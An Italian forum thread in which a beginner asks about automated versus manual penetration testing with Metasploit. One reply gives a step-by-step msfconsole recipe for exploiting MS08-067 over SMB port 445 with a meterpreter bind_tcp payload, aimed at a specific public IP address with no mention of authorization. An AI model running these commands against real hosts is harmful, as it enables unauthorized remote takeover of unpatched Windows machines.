metasploit... fast track o a manina?
Forse la mia é una domanda sciocca... ma avendo un host da testare per le vulnerabilitá, esiste qualche differenza nel risultato utilizzando fast-track, db_autopwn o nel fare delle scansioni e provare una a una le eventuali vulnerabilitá trovate?
Immagino che l'unico vantaggio potrebbe essere il poter modificare alcune delle impostazioni di base di metasploit... peró questo puó cambiare il risultato del test?
Altra cosa che non comprendo: il fatto che il sistema 'non' abbia vulnerabilitá (per metasploit ad esempio), escludendo l'ingegneria sociale, errori clamorosi di chi lo utilizza in configurazioni future del sistema, o malware etc scaricati navigando nel web, manomissione/modifiche diciamo hardware della rete del sistema in questione,... é possibile forarlo utilizzando tools particolari?
Con meno perifrasi, esistono altre tecniche di hacking piú avanzate? Non saprei come lavorare a 'mano' o vabbeh scrivendo ad hoc script per poter spiengere in remoto una macchina a funzionare in un certo modo per creare delle vulnerabilitá, o alcuni tipo di funzionamento anomalo che si possono sfruttare ?
Come sempre grazie per la pazienza e spero di essermi potuto spiegare, come si nota dalle mie domande stó cercando di chiarirmi alcuni punti sul tema della sicurezza, di cui non só quasi nulla...
Re: metasploit... fast track o a manina?
a manina impari qualcosa (vedi i servizi attivi sul tuo pc vittima, cerchi nella documentazione come funzionano, vedi le vulnerabilita' e ti sforzi di trovare il modo per sfruttarle), con fast track rimani al punto di partenza.
Se vai di "manina" scopri anche che non c'e' solo metasploit framework al mondo...
Re: metasploit... fast track o a manina?
Fast-track, db_autopwn non sono in grado di darti nessuna vulnerabilità. Semmai sfruttano una vulnerabilita scoperta. Sempre chè il computer target non sia aggiornato. Una volta scoperta la vulnerabilità con per esempio: Acunetix, nmap, Nessus ecc.solo allora ci puoi lavorare sopra. Ti faccio un esempio di come attaccare un pc con la porta 445 aperta:
01)load msfconsole of metasploit
02)msf> info exploit/windows/smb/ms08_067_netapi (Note: questo exploit può cambiare)
03)msf> use exploit/windows/smb/ms08_067_netapi
04)msf exploit(ms08_067_netapi) > show options
05)msf exploit/ms08_067_netapi) > set RHOST 87.16.235.246 (Note: questo IP può cambiare)
06)msf exploit(ms08_067_netapi) > set payload windows/meterpreter/bind_tcp (Note: questo exploit può cambiare)
07)msf exploit(ms08_067_netapi) > show options
08)msf exploit(ms08_067_netapi) > info
09)msf exploit(ms08_067_netapi) > show targets
10)msf exploit(ms08_067_netapi) > set target 25 (Note: questo numero può variare)
11) msf exploit(ms08_067_netapi) > exploit
Posting Permissions
